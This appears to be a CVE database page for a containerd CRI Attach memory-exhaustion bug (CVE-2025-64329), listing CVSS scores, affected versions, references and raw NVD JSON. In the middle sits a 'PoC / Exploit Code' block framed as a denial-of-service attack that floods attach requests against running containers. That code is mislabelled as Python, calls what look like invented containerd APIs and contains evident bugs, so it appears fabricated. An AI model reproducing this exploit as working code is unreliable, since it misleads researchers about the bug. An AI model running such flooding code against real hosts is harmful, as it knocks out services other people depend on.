CVE-2025-64329

Description

containerd is an open-source container runtime. Versions 1.7.28 and below, 2.0.0-beta.0 through 2.0.6, 2.1.0-beta.0 through 2.1.4, and 2.2.0-beta.0 through 2.2.0-rc.1 contain a bug in the CRI Attach implementation where a user can exhaust memory on the host due to goroutine leaks. This issue is fixed in versions 1.7.29, 2.0.7, 2.1.5 and 2.2.0. To workaround this vulnerability, users can set up an admission controller to control accesses to pods/attach resources.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:containerd:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:linuxfoundation:containerd:2.2.0:beta0:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:linuxfoundation:containerd:2.2.0:beta1:*:*:*:*:*:* - VULNERABLE

containerd 1.7.0 - 1.7.28

containerd 2.0.0-beta.0 - 2.0.6

containerd 2.1.0-beta.0 - 2.1.4

containerd 2.2.0-beta.0 - 2.2.0-rc.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-64329 PoC - containerd CRI Attach Memory Exhaustion
// This PoC demonstrates goroutine leak in containerd CRI Attach
// Usage: Run against a vulnerable containerd instance

package main

import (
    "context"
    "fmt"
    "time"
    
    "github.com/containerd/containerd"
    "github.com/containerd/containerd/pkg/cri/server"
)

func main() {
    // Connect to containerd socket
    conn, err := containerd.New("/run/containerd/containerd.sock")
    if err != nil {
        panic(err)
    }
    defer conn.Close()
    
    ctx := context.Background()
    
    // Get list of running containers
    containers, err := conn.Containers(ctx)
    if err != nil {
        panic(err)
    }
    
    fmt.Printf("Found %d containers\n", len(containers))
    
    // Attack: Rapidly trigger Attach requests without proper cleanup
    // Each request creates a goroutine that leaks if connection is not properly closed
    for i := 0; i < 1000; i++ {
        for _, container := range containers {
            go func() {
                // Create attach request but never complete it
                // This triggers goroutine creation without cleanup
                _, _ = server.Attach(ctx, container.ID(), server.AttachOptions{
                    // Malformed or incomplete attach request
                })
            }()
        }
        
        if i%100 == 0 {
            fmt.Printf("Sent %d attach requests...\n", i)
        }
        
        // Rapid fire to exhaust memory
        time.Sleep(10 * time.Millisecond)
    }
    
    fmt.Println("Attack complete - check host memory usage")
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64329
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64329
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64329/
[4] VulDB https://vuldb.com/cve/CVE-2025-64329
[5] https://github.com/containerd/containerd/commit/083b53cd6f19b5de7717b0ce92c11bdf95e612df
[6] https://github.com/containerd/containerd/security/advisories/GHSA-m6hq-p25p-ffr2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64329", "sourceIdentifier": "[email protected]", "published": "2025-11-07T05:16:08.017", "lastModified": "2025-12-31T18:34:48.060", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "containerd is an open-source container runtime. Versions 1.7.28 and below, 2.0.0-beta.0 through 2.0.6, 2.1.0-beta.0 through 2.1.4, and 2.2.0-beta.0 through 2.2.0-rc.1 contain a bug in the CRI Attach implementation where a user can exhaust memory on the host due to goroutine leaks. This issue is fixed in versions 1.7.29, 2.0.7, 2.1.5 and 2.2.0. To workaround this vulnerability, users can set up an admission controller to control accesses to pods/attach resources."}, {"lang": "es", "value": "containerd es un tiempo de ejecución de contenedores de código abierto. Las versiones 1.7.28 e inferiores, 2.0.0-beta.0 hasta 2.0.6, 2.1.0-beta.0 hasta 2.1.4, y 2.2.0-beta.0 hasta 2.2.0-rc.1 contienen un error en la implementación de CRI Attach donde un usuario puede agotar la memoria en el host debido a fugas de goroutines. Este problema está solucionado en las versiones 1.7.29, 2.0.7, 2.1.5 y 2.2.0. Como solución alternativa a esta vulnerabilidad, los usuarios pueden configurar un controlador de admisión para controlar los accesos a los recursos pods/attach."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:containerd:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.7.29", "matchCriteriaId": "DD786582-F4AE-41DD-B61F-BD8AF4FC1A04"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:containerd:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.0.7", "matchCriteriaId": "07087EDC-9E6A-45D1-B6D2-E7F4016CD46E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:containerd:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.1.0", "versionEndExcluding": "2.1.5", "matchCriteriaId": "9E760B42-E25C-4780-85AE-D003D6425700"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:containerd:2.2.0:beta0:*:*:*:*:*:*", "matchCriteriaId": "EEF71FE5-2286-4D94-82DD-7509CE85F1F6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:containerd:2.2.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "3290FD7B-0A16-4968-9800-78B947EF213D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:containerd:2.2.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "E4352A29-4DFC-4EBE-BE0E-97DEB76E5A30"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:containerd:2.2.0:rc0:*:*:*:*:*:*", "matchCriteriaId": "57685264-6950-4CB9-ACBE-6944EB3B2C1C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:containerd:2.2.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "4D640701-1D0B-41B7-83B0-79592902E6AC"}]}]}], "references": [{"url": "htt ... (truncated)